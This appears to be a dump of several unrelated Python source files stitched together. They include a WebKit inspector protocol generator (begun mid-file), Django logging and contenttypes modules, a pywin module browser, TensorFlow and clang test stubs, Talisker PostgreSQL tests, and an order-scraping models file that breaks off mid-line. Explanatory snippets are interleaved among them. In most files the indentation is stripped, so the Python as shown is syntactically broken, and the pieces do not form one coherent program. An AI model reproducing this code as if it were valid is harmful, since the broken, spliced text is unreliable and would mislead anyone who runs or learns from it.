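The write-only-if-changed behavior of `IncrementalFileWriter` can be sketched standalone. This is an illustrative re-implementation of the same idea, not the script's own class:

```python
import os
import tempfile

class IncrementalWriter:
    """Buffer text and rewrite the target file only when the content changed."""
    def __init__(self, filepath, force_output=False):
        self._filepath = filepath
        self._output = ""
        self.force_output = force_output

    def write(self, text):
        self._output += text

    def close(self):
        self._output = self._output.rstrip() + "\n"
        text_changed = True
        try:
            with open(self._filepath, "r") as f:
                text_changed = f.read() != self._output
        except IOError:
            pass  # no previous file: treat as changed and write it
        if text_changed or self.force_output:
            with open(self._filepath, "w") as f:
                f.write(self._output)

# The first close() creates the file; an identical second close() never
# reopens it for writing, so build steps watching mtimes see no change.
path = os.path.join(tempfile.mkdtemp(), "out.txt")
w = IncrementalWriter(path)
w.write("hello")
w.close()
first_mtime = os.path.getmtime(path)
w2 = IncrementalWriter(path)
w2.write("hello")
w2.close()
```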
def generate_from_specification(primary_specification_filepath=None,
supplemental_specification_filepaths=[],
concatenate_output=False,
output_dirpath=None,
force_output=False,
framework_name=""):
def load_specification(protocol, filepath, isSupplemental=False):
try:
with open(filepath, "r") as input_file:
parsed_json = json.load(input_file)
protocol.parse_specification(parsed_json, isSupplemental)
except ValueError as e:
raise Exception("Error parsing valid JSON in file: " + filepath)
protocol = models.Protocol(framework_name)
for specification in supplemental_specification_filepaths:
load_specification(protocol, specification, isSupplemental=True)
load_specification(protocol, primary_specification_filepath, isSupplemental=False)
protocol.resolve_types()
generators = []
is_test = protocol.framework is Frameworks.Test
if is_test or protocol.framework is not Frameworks.WebInspector:
generators.append(CppAlternateBackendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(JSBackendCommandsGenerator(protocol, primary_specification_filepath))
generators.append(CppBackendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(CppBackendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(CppFrontendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(CppFrontendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(CppProtocolTypesHeaderGenerator(protocol, primary_specification_filepath))
generators.append(CppProtocolTypesImplementationGenerator(protocol, primary_specification_filepath))
if is_test or protocol.framework is Frameworks.WebInspector:
generators.append(ObjCBackendDispatcherHeaderGenerator(protocol, primary_specification_filepath))
generators.append(ObjCBackendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCConfigurationHeaderGenerator(protocol, primary_specification_filepath))
generators.append(ObjCConfigurationImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCConversionHelpersGenerator(protocol, primary_specification_filepath))
generators.append(ObjCFrontendDispatcherImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCHeaderGenerator(protocol, primary_specification_filepath))
generators.append(ObjCProtocolTypesImplementationGenerator(protocol, primary_specification_filepath))
generators.append(ObjCInternalHeaderGenerator(protocol, primary_specification_filepath))
single_output_file_contents = []
for generator in generators:
output = generator.generate_output()
if concatenate_output:
single_output_file_contents.append('### Begin File: %s' % generator.output_filename())
single_output_file_contents.append(output)
single_output_file_contents.append('### End File: %s' % generator.output_filename())
single_output_file_contents.append('')
else:
output_file = IncrementalFileWriter(os.path.join(output_dirpath, generator.output_filename()), force_output)
output_file.write(output)
output_file.close()
if concatenate_output:
filename = os.path.join(os.path.basename(primary_specification_filepath) + '-result')
output_file = IncrementalFileWriter(os.path.join(output_dirpath, filename), force_output)
output_file.write('\n'.join(single_output_file_contents))
output_file.close()
if __name__ == '__main__':
allowed_framework_names = ['JavaScriptCore', 'WebInspector', 'Test']
cli_parser = optparse.OptionParser(usage="usage: %prog [options] PrimaryProtocol.json [SupplementalProtocol.json ...]")
cli_parser.add_option("-o", "--outputDir", help="Directory where generated files should be written.")
cli_parser.add_option("--framework", type="choice", choices=allowed_framework_names, help="The framework that the primary specification belongs to.")
cli_parser.add_option("--force", action="store_true", help="Force output of generated scripts, even if nothing changed.")
cli_parser.add_option("-v", "--debug", action="store_true", help="Log extra output for debugging the generator itself.")
cli_parser.add_option("-t", "--test", action="store_true", help="Enable test mode. Use unique output filenames created by prepending the input filename.")
options = None
arg_options, arg_values = cli_parser.parse_args()
if (len(arg_values) < 1):
raise ParseException("At least one plain argument expected")
if not arg_options.outputDir:
raise ParseException("Missing output directory")
if arg_options.debug:
log.setLevel(logging.DEBUG)
options = {
'primary_specification_filepath': arg_values[0],
'supplemental_specification_filepaths': arg_values[1:],
'output_dirpath': arg_options.outputDir,
'concatenate_output': arg_options.test,
'framework_name': arg_options.framework,
'force_output': arg_options.force
}
try:
generate_from_specification(**options)
except (ParseException, TypecheckException) as e:
if arg_options.test:
log.error(e.message)
else:
raise # Force the build to fail.
|
Yong-Lee/django | refs/heads/master | django/utils/log.py | 116 | from __future__ import unicode_literals
import logging
import logging.config # needed when logging_config doesn't start with logging.config
import sys
import warnings
from copy import copy
from django.conf import settings
from django.core import mail
from django.core.mail import get_connection
from django.utils.deprecation import RemovedInNextVersionWarning
from django.utils.module_loading import import_string
from django.views.debug import ExceptionReporter
# Default logging for Django. This sends an email to the site admins on every
# HTTP 500 error. Depending on DEBUG, all other log records are either sent to
# the console (DEBUG=True) or discarded by means of the NullHandler (DEBUG=False).
DEFAULT_LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse',
},
'require_debug_true': {
'()': 'django.utils.log.RequireDebugTrue',
},
},
'handlers': {
'console': {
'level': 'INFO',
'filters': ['require_debug_true'],
'class': 'logging.StreamHandler',
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django': {
'handlers': ['console', 'mail_admins'],
},
'py.warnings': {
'handlers': ['console'],
},
}
}
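The `'()'` entries in the filter configuration are dictConfig's factory syntax: the named callable is invoked to construct the filter object. A minimal, self-contained sketch of that mechanism using a stand-in filter (all names here are illustrative):

```python
import io
import logging
import logging.config

stream = io.StringIO()

class OnlyWarnings(logging.Filter):
    def filter(self, record):
        return record.levelno >= logging.WARNING

logging.config.dictConfig({
    'version': 1,
    'disable_existing_loggers': False,
    # '()' names the factory callable used to build the filter instance
    'filters': {'only_warnings': {'()': OnlyWarnings}},
    'handlers': {'buf': {
        'class': 'logging.StreamHandler',
        'stream': stream,
        'level': 'DEBUG',
        'filters': ['only_warnings'],
    }},
    'loggers': {'demo': {'handlers': ['buf'], 'level': 'DEBUG',
                         'propagate': False}},
})

logging.getLogger('demo').info('suppressed by the filter')
logging.getLogger('demo').warning('emitted')
```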
def configure_logging(logging_config, logging_settings):
if not sys.warnoptions:
# Route warnings through python logging
logging.captureWarnings(True)
# RemovedInNextVersionWarning is a subclass of DeprecationWarning which
# is hidden by default, hence we force the "default" behavior
warnings.simplefilter("default", RemovedInNextVersionWarning)
if logging_config:
# First find the logging configuration function ...
logging_config_func = import_string(logging_config)
logging.config.dictConfig(DEFAULT_LOGGING)
# ... then invoke it with the logging settings
if logging_settings:
logging_config_func(logging_settings)
class AdminEmailHandler(logging.Handler):
"""An exception log handler that emails log entries to site admins.
If the request is passed as the first argument to the log record,
request data will be provided in the email report.
"""
def __init__(self, include_html=False, email_backend=None):
logging.Handler.__init__(self)
self.include_html = include_html
self.email_backend = email_backend
def emit(self, record):
try:
request = record.request
subject = '%s (%s IP): %s' % (
record.levelname,
('internal' if request.META.get('REMOTE_ADDR') in settings.INTERNAL_IPS
else 'EXTERNAL'),
record.getMessage()
)
except Exception:
subject = '%s: %s' % (
record.levelname,
record.getMessage()
)
request = None
subject = self.format_subject(subject)
# Since we add a nicely formatted traceback on our own, create a copy
# of the log record without the exception data.
no_exc_record = copy(record)
no_exc_record.exc_info = None
no_exc_record.exc_text = None
if record.exc_info:
exc_info = record.exc_info
else:
exc_info = (None, record.getMessage(), None)
reporter = ExceptionReporter(request, is_email=True, *exc_info)
message = "%s\n\n%s" % (self.format(no_exc_record), reporter.get_traceback_text())
html_message = reporter.get_traceback_html() if self.include_html else None
self.send_mail(subject, message, fail_silently=True, html_message=html_message)
def send_mail(self, subject, message, *args, **kwargs):
mail.mail_admins(subject, message, *args, connection=self.connection(), **kwargs)
def connection(self):
return get_connection(backend=self.email_backend, fail_silently=True)
def format_subject(self, subject):
"""
Escape CR and LF characters, and limit length.
RFC 2822's hard limit is 998 characters per line. So, minus "Subject: "
the actual subject must be no longer than 989 characters.
"""
formatted_subject = subject.replace('\n', '\\n').replace('\r', '\\r')
return formatted_subject[:989]
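The escaping and truncation described in the docstring can be demonstrated with a standalone copy of the logic (989 = 998 minus the 9 characters of "Subject: "):

```python
def format_subject(subject):
    # Escape CR/LF so a multi-line log message cannot inject extra mail
    # headers, then cap the length at RFC 2822's line limit minus the
    # "Subject: " prefix.
    formatted = subject.replace('\n', '\\n').replace('\r', '\\r')
    return formatted[:989]

assert format_subject("broken\r\nheader") == "broken\\r\\nheader"
assert len(format_subject("x" * 2000)) == 989
```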
class CallbackFilter(logging.Filter):
"""
A logging filter that checks the return value of a given callable (which
takes the record-to-be-logged as its only parameter) to decide whether to
log a record.
"""
def __init__(self, callback):
self.callback = callback
def filter(self, record):
if self.callback(record):
return 1
return 0
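A sketch of how a filter like `CallbackFilter` is typically attached: the callback inspects each record and the handler drops anything it rejects (the logger and handler names here are illustrative):

```python
import io
import logging

class CallbackFilter(logging.Filter):
    """Standalone copy: delegate the keep/drop decision to a callable."""
    def __init__(self, callback):
        self.callback = callback
    def filter(self, record):
        return 1 if self.callback(record) else 0

stream = io.StringIO()
handler = logging.StreamHandler(stream)
handler.addFilter(CallbackFilter(lambda record: record.levelno >= logging.ERROR))

logger = logging.getLogger("callback_filter_demo")
logger.setLevel(logging.DEBUG)
logger.addHandler(handler)
logger.propagate = False

logger.info("dropped")   # callback returns False -> never written
logger.error("kept")     # callback returns True  -> written to the stream
```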
class RequireDebugFalse(logging.Filter):
def filter(self, record):
return not settings.DEBUG
class RequireDebugTrue(logging.Filter):
def filter(self, record):
return settings.DEBUG
|
tjsavage/djangononrel-starter | refs/heads/master | django/contrib/contenttypes/models.py | 307 | from django.db import models
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode
class ContentTypeManager(models.Manager):
# Cache to avoid re-looking up ContentType objects all over the place.
# This cache is shared by all the get_for_* methods.
_cache = {}
def get_by_natural_key(self, app_label, model):
try:
ct = self.__class__._cache[self.db][(app_label, model)]
except KeyError:
ct = self.get(app_label=app_label, model=model)
return ct
def get_for_model(self, model):
"""
Returns the ContentType object for a given model, creating the
ContentType if necessary. Lookups are cached so that subsequent lookups
for the same model don't hit the database.
"""
opts = model._meta
while opts.proxy:
model = opts.proxy_for_model
opts = model._meta
key = (opts.app_label, opts.object_name.lower())
try:
ct = self.__class__._cache[self.db][key]
except KeyError:
# Load or create the ContentType entry. The smart_unicode() is
# needed around opts.verbose_name_raw because name_raw might be a
# django.utils.functional.__proxy__ object.
ct, created = self.get_or_create(
app_label = opts.app_label,
model = opts.object_name.lower(),
defaults = {'name': smart_unicode(opts.verbose_name_raw)},
)
self._add_to_cache(self.db, ct)
return ct
def get_for_id(self, id):
"""
Look up a ContentType by ID. Uses the same shared cache as get_for_model
(though ContentTypes are obviously not created on-the-fly by get_for_id).
"""
try:
ct = self.__class__._cache[self.db][id]
except KeyError:
# This could raise a DoesNotExist; that's correct behavior and will
# make sure that only correct ctypes get stored in the cache dict.
ct = self.get(pk=id)
self._add_to_cache(self.db, ct)
return ct
def clear_cache(self):
"""
Clear out the content-type cache. This needs to happen during database
flushes to prevent caching of "stale" content type IDs (see
django.contrib.contenttypes.management.update_contenttypes for where
this gets called).
"""
self.__class__._cache.clear()
def _add_to_cache(self, using, ct):
"""Insert a ContentType into the cache."""
model = ct.model_class()
key = (model._meta.app_label, model._meta.object_name.lower())
self.__class__._cache.setdefault(using, {})[key] = ct
self.__class__._cache.setdefault(using, {})[ct.id] = ct
class ContentType(models.Model):
name = models.CharField(max_length=100)
app_label = models.CharField(max_length=100)
model = models.CharField(_('python model class name'), max_length=100)
objects = ContentTypeManager()
class Meta:
verbose_name = _('content type')
verbose_name_plural = _('content types')
db_table = 'django_content_type'
ordering = ('name',)
unique_together = (('app_label', 'model'),)
def __unicode__(self):
return self.name
def model_class(self):
"Returns the Python model class for this type of content."
from django.db import models
return models.get_model(self.app_label, self.model)
def get_object_for_this_type(self, **kwargs):
"""
Returns an object of this type for the keyword arguments given.
Basically, this is a proxy around this object_type's get_object() model
method. The ObjectDoesNotExist exception, if thrown, will not be caught,
so code that calls this method should catch it.
"""
return self.model_class()._default_manager.using(self._state.db).get(**kwargs)
def natural_key(self):
return (self.app_label, self.model)
|
leighpauls/k2cro4 | refs/heads/master | third_party/python_26/Lib/site-packages/pythonwin/pywin/framework/editor/ModuleBrowser.py | 17 | # ModuleBrowser.py - A view that provides a module browser for an editor document.
import pywin.mfc.docview
import win32ui
import win32con
import commctrl
import win32api
from pywin.tools import hierlist, browser
import pywin.framework.scriptutils
import afxres
import pyclbr
class HierListCLBRModule(hierlist.HierListItem):
def __init__(self, modName, clbrdata):
self.modName = modName
self.clbrdata = clbrdata
def GetText(self):
return self.modName
def GetSubList(self):
ret = []
for item in self.clbrdata.values():
if item.__class__ != pyclbr.Class: # ie, it is a pyclbr Function instance (only introduced post 1.5.2)
ret.append(HierListCLBRFunction( item ) )
else:
ret.append(HierListCLBRClass( item) )
ret.sort()
return ret
def IsExpandable(self):
return 1
class HierListCLBRItem(hierlist.HierListItem):
def __init__(self, name, file, lineno, suffix = ""):
self.name = str(name)
self.file = file
self.lineno = lineno
self.suffix = suffix
def __cmp__(self, other):
return cmp(self.name, other.name)
def GetText(self):
return self.name + self.suffix
def TakeDefaultAction(self):
if self.file:
pywin.framework.scriptutils.JumpToDocument(self.file, self.lineno, bScrollToTop = 1)
else:
win32ui.SetStatusText("Can not locate the source code for this object.")
def PerformItemSelected(self):
if self.file is None:
msg = "%s - source can not be located." % (self.name, )
else:
msg = "%s defined at line %d of %s" % (self.name, self.lineno, self.file)
win32ui.SetStatusText(msg)
class HierListCLBRClass(HierListCLBRItem):
def __init__(self, clbrclass, suffix = ""):
try:
name = clbrclass.name
file = clbrclass.file
lineno = clbrclass.lineno
self.super = clbrclass.super
self.methods = clbrclass.methods
except AttributeError:
name = clbrclass
file = lineno = None
self.super = []; self.methods = {}
HierListCLBRItem.__init__(self, name, file, lineno, suffix)
def __cmp__(self,other):
ret = cmp(self.name,other.name)
if ret==0 and (self is not other) and self.file==other.file:
self.methods = other.methods
self.super = other.super
self.lineno = other.lineno
return ret
def GetSubList(self):
r1 = []
for c in self.super:
r1.append(HierListCLBRClass(c, " (Parent class)"))
r1.sort()
r2=[]
for meth, lineno in self.methods.items():
r2.append(HierListCLBRMethod(meth, self.file, lineno))
r2.sort()
return r1+r2
def IsExpandable(self):
return len(self.methods) + len(self.super)
def GetBitmapColumn(self):
return 21
class HierListCLBRFunction(HierListCLBRItem):
def __init__(self, clbrfunc, suffix = ""):
name = clbrfunc.name
file = clbrfunc.file
lineno = clbrfunc.lineno
HierListCLBRItem.__init__(self, name, file, lineno, suffix)
def GetBitmapColumn(self):
return 22
class HierListCLBRMethod(HierListCLBRItem):
def GetBitmapColumn(self):
return 22
class HierListCLBRErrorItem(hierlist.HierListItem):
def __init__(self, text):
self.text = text
def GetText(self):
return self.text
def GetSubList(self):
return [HierListCLBRErrorItem(self.text)]
def IsExpandable(self):
return 0
class HierListCLBRErrorRoot(HierListCLBRErrorItem):
def IsExpandable(self):
return 1
class BrowserView(pywin.mfc.docview.TreeView):
def OnInitialUpdate(self):
self.list = None
rc = self._obj_.OnInitialUpdate()
self.HookMessage(self.OnSize, win32con.WM_SIZE)
self.bDirty = 0
self.destroying = 0
return rc
def DestroyBrowser(self):
self.DestroyList()
def OnActivateView(self, activate, av, dv):
# print "AV", self.bDirty, activate
if activate:
self.CheckRefreshList()
return self._obj_.OnActivateView(activate, av, dv)
def _MakeRoot(self):
path = self.GetDocument().GetPathName()
if not path:
return HierListCLBRErrorRoot("Error: Can not browse a file until it is saved")
else:
mod, path = pywin.framework.scriptutils.GetPackageModuleName(path)
if self.bDirty:
what = "Refreshing"
# Hack for pyclbr being too smart
try:
del pyclbr._modules[mod]
except (KeyError, AttributeError):
pass
else:
what = "Building"
win32ui.SetStatusText("%s class list - please wait..." % (what,), 1)
win32ui.DoWaitCursor(1)
try:
reader = pyclbr.readmodule_ex # new version post 1.5.2
except AttributeError:
reader = pyclbr.readmodule
try:
data = reader(mod, [path])
if data:
return HierListCLBRModule(mod, data)
else:
return HierListCLBRErrorRoot("No Python classes in module.")
finally:
win32ui.DoWaitCursor(0)
win32ui.SetStatusText(win32ui.LoadString(afxres.AFX_IDS_IDLEMESSAGE))
def DestroyList(self):
self.destroying = 1
list = getattr(self, "list", None) # If the document was not successfully opened, we may not have a list.
self.list = None
if list is not None:
list.HierTerm()
self.destroying = 0
def CheckMadeList(self):
if self.list is not None or self.destroying: return
self.rootitem = root = self._MakeRoot()
self.list = list = hierlist.HierListWithItems( root, win32ui.IDB_BROWSER_HIER)
list.HierInit(self.GetParentFrame(), self)
list.SetStyle(commctrl.TVS_HASLINES | commctrl.TVS_LINESATROOT | commctrl.TVS_HASBUTTONS)
def CheckRefreshList(self):
if self.bDirty:
if self.list is None:
self.CheckMadeList()
else:
new_root = self._MakeRoot()
if self.rootitem.__class__==new_root.__class__==HierListCLBRModule:
self.rootitem.modName = new_root.modName
self.rootitem.clbrdata = new_root.clbrdata
self.list.Refresh()
else:
self.list.AcceptRoot(self._MakeRoot())
self.bDirty = 0
def OnSize(self, params):
lparam = params[3]
w = win32api.LOWORD(lparam)
h = win32api.HIWORD(lparam)
if w != 0:
self.CheckMadeList()
else:
self.DestroyList()
return 1
def _UpdateUIForState(self):
self.bDirty = 1
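The tree above is populated by pyclbr, which scans a module's source without importing it and returns a mapping of top-level classes and functions. A minimal illustration (the module inspected here is arbitrary):

```python
import pyclbr

# readmodule_ex also reports plain functions, which is why _MakeRoot
# prefers it over the older readmodule when it is available.
data = pyclbr.readmodule_ex("json.tool")

functions = [n for n, item in data.items() if isinstance(item, pyclbr.Function)]
classes = [n for n, item in data.items() if isinstance(item, pyclbr.Class)]

# json.tool defines a top-level main() entry point.
assert "main" in functions
```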
|
cxxgtxy/tensorflow | refs/heads/master | tensorflow/contrib/quantization/python/nn_ops.py | 179 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Wrappers for primitive Neural Net (NN) Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,wildcard-import
from tensorflow.python.framework import common_shapes
from tensorflow.python.framework import ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops.gen_nn_ops import *
# pylint: enable=unused-import,wildcard-import
|
gganis/root | refs/heads/master | interpreter/llvm/src/tools/clang/tools/scan-build-py/tests/unit/__init__.py | 24 | # -*- coding: utf-8 -*-
# The LLVM Compiler Infrastructure
#
# This file is distributed under the University of Illinois Open Source
# License. See LICENSE.TXT for details.
from . import test_libear
from . import test_compilation
from . import test_clang
from . import test_runner
from . import test_report
from . import test_analyze
from . import test_intercept
from . import test_shell
def load_tests(loader, suite, _):
suite.addTests(loader.loadTestsFromModule(test_libear))
suite.addTests(loader.loadTestsFromModule(test_compilation))
suite.addTests(loader.loadTestsFromModule(test_clang))
suite.addTests(loader.loadTestsFromModule(test_runner))
suite.addTests(loader.loadTestsFromModule(test_report))
suite.addTests(loader.loadTestsFromModule(test_analyze))
suite.addTests(loader.loadTestsFromModule(test_intercept))
suite.addTests(loader.loadTestsFromModule(test_shell))
return suite
|
bloodearnest/talisker | refs/heads/master | tests/test_postgresql.py | 2 | #
# Copyright (c) 2015-2018 Canonical, Ltd.
#
# This file is part of Talisker
# (see http://github.com/canonical-ols/talisker).
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
from builtins import * # noqa
import pytest
from freezegun import freeze_time
try:
import psycopg2 # NOQA
except ImportError:
pytest.skip("skipping postgres only tests", allow_module_level=True)
# need for some fixtures
from tests import conftest # noqa
from talisker.postgresql import (
TaliskerConnection,
prettify_sql,
FILTERED,
)
import talisker.sentry
@pytest.fixture
def conn(postgresql):
return TaliskerConnection(postgresql.dsn)
@pytest.fixture
def cursor(conn):
return conn.cursor()
def test_connection_record_slow(conn, context, get_breadcrumbs):
query = 'select * from table where id=%s'
conn._threshold = 0
conn._record('msg', query, (1,), 10000)
records = context.logs.filter(name='talisker.slowqueries')
assert records[0].extra['duration_ms'] == 10000.0
assert records[0]._trailer == prettify_sql(query)
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_connection_record_fast(conn, context):
query = 'select * from table'
conn._record('msg', query, None, 0)
context.assert_not_log(name='talisker.slowqueries')
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_connection_record_breadcrumb(conn, get_breadcrumbs):
talisker.Context.new()
query = 'select * from table'
conn._record('msg', query, None, 1000)
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['message'] == 'msg'
assert breadcrumb['category'] == 'sql'
assert breadcrumb['data']['duration_ms'] == 1000.0
assert breadcrumb['data']['connection'] == conn.safe_dsn
assert 'query' in breadcrumb['data']
@freeze_time()
def test_cursor_sets_statement_timeout(cursor, get_breadcrumbs):
talisker.Context.new()
talisker.Context.set_relative_deadline(1000)
cursor.execute('select %s', [1])
crumbs = get_breadcrumbs()
assert crumbs[0]['data']['query'] == 'SELECT %s'
assert crumbs[0]['data']['timeout'] == 1000
def test_cursor_actually_times_out(cursor, get_breadcrumbs):
talisker.Context.new()
talisker.Context.set_relative_deadline(10)
with pytest.raises(psycopg2.OperationalError) as err:
cursor.execute('select pg_sleep(1)', [1])
assert err.value.pgcode == '57014'
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['data']['timedout'] is True
assert breadcrumb['data']['pgcode'] == '57014'
assert breadcrumb['data']['pgerror'] == (
'ERROR: canceling statement due to statement timeout\n'
)
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_cursor_execute_no_params(cursor, get_breadcrumbs):
talisker.Context.new()
cursor.execute('select 1')
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['data']['query'] == FILTERED
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_cursor_callproc_with_params(cursor, get_breadcrumbs):
talisker.Context.new()
cursor.execute(
"""CREATE OR REPLACE FUNCTION test(integer) RETURNS integer
AS 'select $1'
LANGUAGE SQL;""")
cursor.callproc('test', [1])
breadcrumb = get_breadcrumbs()[1]
assert breadcrumb['data']['query'] == FILTERED
@pytest.mark.skipif(not talisker.sentry.enabled, reason='need raven installed')
def test_cursor_callproc_no_params(cursor, get_breadcrumbs):
talisker.Context.new()
cursor.execute(
"""CREATE OR REPLACE FUNCTION test() RETURNS integer
AS 'select 1'
LANGUAGE SQL;""")
cursor.callproc('test')
breadcrumb = get_breadcrumbs()[0]
assert breadcrumb['data']['query'] == FILTERED
|
lastcc/OAHelper | refs/heads/master | oa/models.py | 1 | # -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
from log_config import logger
class Struct(object):
"""
    An object that has attributes built from the dictionary given in the
    constructor. So ss=Struct(a=1, b='b') will satisfy assert ss.a == 1
and assert ss.b == 'b'.
"""
def __init__(self, **kwargs):
self.__dict__.update(kwargs)
def __getitem__(self, key):
return self.__dict__[key]
def get_items(self, keys):
keys = keys.split('/')
L = []
for key in keys:
value = self.__dict__[key]
L.append(value)
return L
def set_items(self, keys, values):
if isinstance(keys, (unicode, str)):
keys = keys.split('/')
if not isinstance(values, (list, tuple)):
            raise TypeError('values must be a list or tuple')
elif not len(keys) == len(values):
print keys
print values
while len(keys) > len(values):
keys.append('ph')
while len(values) > len(keys):
values.append('ph')
#raise ZeroDivisionError('not the same length')
d=dict(zip(keys,values))
self.__dict__.update(d)
def __len__(self):
return len(self.__dict__)
def __getattr__(self, attr):
if attr.startswith('get_'):
name = attr[4:]
return self.__dict__[name]
else:
            # __getattr__ must raise AttributeError so hasattr() works correctly
            raise AttributeError('No such attribute: %r' % attr)
def mergeXYZ(self, *objects):
d = {}
for xxx in objects:
d.update(xxx.__dict__)
new = self.__class__(**d)
return new
def mergeINPLACE(self, y):
dY = y.__dict__
self.__dict__.update(dY)
return self
def __add__(self, other):
if not isinstance(other, Struct):
return NotImplemented
d = {}
d.update(self.__dict__)
d.update(other.__dict__)
return self.__class__(**d)
def set_defaults(self, keys, v=''):
if isinstance(keys, (unicode, str)):
for k in keys.split('/'):
self.__dict__[k] = v
class Finder(object):
def __init__(self, J):
self.J = J
self.rows = J.get('rows', [])
self.gen = self.generator()
@property
    def JSON(self):
return self.J
@property
def total(self):
return self.J['total']
def __iter__(self):
return self
def html_filter(self, html):
if not html:
return ''
        soup = BeautifulSoup(html, 'html.parser')
return soup.get_text()
def generator(self):
rows = self.rows
for row in rows:
xxID = row['id']
cell = row['cell']
cell.insert(0, xxID)
new = map(self.html_filter, cell)
yield new
def next(self):
return self.gen.next()
class SearchResultFinder(Finder):
'''JSON Search Result Finder'''
def find_all_orders(self):
L=[]
rows=self.rows
for row in rows:
order=row['id']
L.append(order)
return L
def get_order_object(self, order):
rows=self.rows
ss = Struct()
for rec in Finder(self.J):
this_order = rec[0]
if order == this_order:
keys = 'order/ph/ph/tracking_code/order_error_text/buyer_message/comment_area/paypal_code/buyer/add_email/'\
'add_receiver/CN_dest/warehouse/shipping_method/online_shipping_method/store_name/order_status/'\
'shipped_time/intercepted_for/import_time'
values = rec
ss.set_items(keys, values)
return ss
def get_all_order_objects(self):
L=[]
for order in self.find_all_orders():
L.append(self.get_order_object(order))
return L
def generator(self):
order_objects = self.get_all_order_objects()
for each in order_objects:
yield each
def build_order_info_object(SoupResultSet, order):
keys = 'order_status/warehouse/shipping_method/add_country/add_st1/add_st2/add_state/add_city/add_receiver/add_phone/add_zip/should_weight/'\
'add_email/x_remark/comment_area/order_total/paypal_code/user_cookie/order_x_id/tracking_code/actual_weight/CN_shipping_fee/shipped_time/'\
'store_name/order_error_text/opt_status/buyer_message/online_shipping_method/__place_holder__/ph'
values=[]
for tag in SoupResultSet:
print tag
value=tag.get_text()
values.append(value)
ss = Struct()
ss.set_items(keys, values)
ss.order=order
ss.add_country = ss.add_country.encode('ascii', 'ignore')
return ss
def build_order_detail_containers(soup):
areas=soup.find_all('tr')
L=[]
for area in areas:
tags=area.find_all('td')
ss = Struct()
keys = 'ItemID/ProductName/SKU/POA/Position/Quantity/X_Price/ProductStatus/'\
'Pattern/X_Weight/Y_Weight/ProductManager/TestedBy/FromOrder'
values = []
for tag in tags:
value = tag.get_text()
values.append(value)
ss.set_items(keys, values)
L.append(ss)
return L
def bulid_refund_info(soup, phase):
soup = soup.find('tbody')
if not soup:
return []
areas=soup.find_all('tr')
finished = 'order/amount/currency/reasons/initiator/init_time/confirmed_by/confirm_time/'\
'completed_by/complete_time/paypal_code/final_amount/final_currency/reason_type/paypal_account'
unconfirmed = 'ph/order/amount/transaction_total/currency/reasons/initiator/init_time/ph/ph/ph/reason_type/paypal_account'
confirmed = 'ph/order/amount/currency/reasons/initiator/init_time/confirmed_by/confirm_time/ph/ph/ph/ph/reason_type/ph/ph'
d = {'finished': finished,
'unconfirmed': unconfirmed,
'confirmed': confirmed}
L=[]
for area in areas:
tags=area.find_all('td')
ss = Struct()
default = Struct()
default.set_defaults(finished)
default.set_defaults(unconfirmed)
default.set_defaults(confirmed)
keys = d[phase]
values = []
for tag in tags:
value = tag.get_text(strip=True)
values.append(value)
ss.set_items(keys, values)
ss.reason_CN, sep, ss.reason_EN = ss.reasons.rpartition('\n')
color = area.get('class', None)
ss.refund_error = color
ss.phase = phase
new = default + ss
L.append(new)
return L
class MailRecordsFinder(Finder):
'''This is for Mail Records'''
def find_ids(self):
L=[]
rows=self.rows
for row in rows:
this_id=row['id']
            L.append(this_id)
        return L
def generator(self):
rows = self.rows
for rec in Finder(self.J):
this_id, ph, ph, title, sender, receiver, time, sent, responder, X_ID = rec
link = 'http://banggood.sellercube.com/MailReceived/SearchDetail/%s' % this_id
yield this_id, link, title, sender, receiver, time, sent, responder
class MailInboxFinder(Finder):
'''This is for Mail Inbox'''
def find_buyers(self):
L=[]
rows=self.rows
for row in rows:
cell=row['cell']
buyer=cell[8]
if buyer in L or not buyer:
continue
L.append(buyer)
return L
def generator(self):
existed = []
for rec in Finder(self.J):
ss = Struct()
keys = 'MAIL_ID/PH/PH/PH/PH/MAIL_TITLE/MAIL_SENDER/MAIL_RECEIVER/MAIL_ITEM/MAIL_BUYER/MAIL_RESPONDER/'\
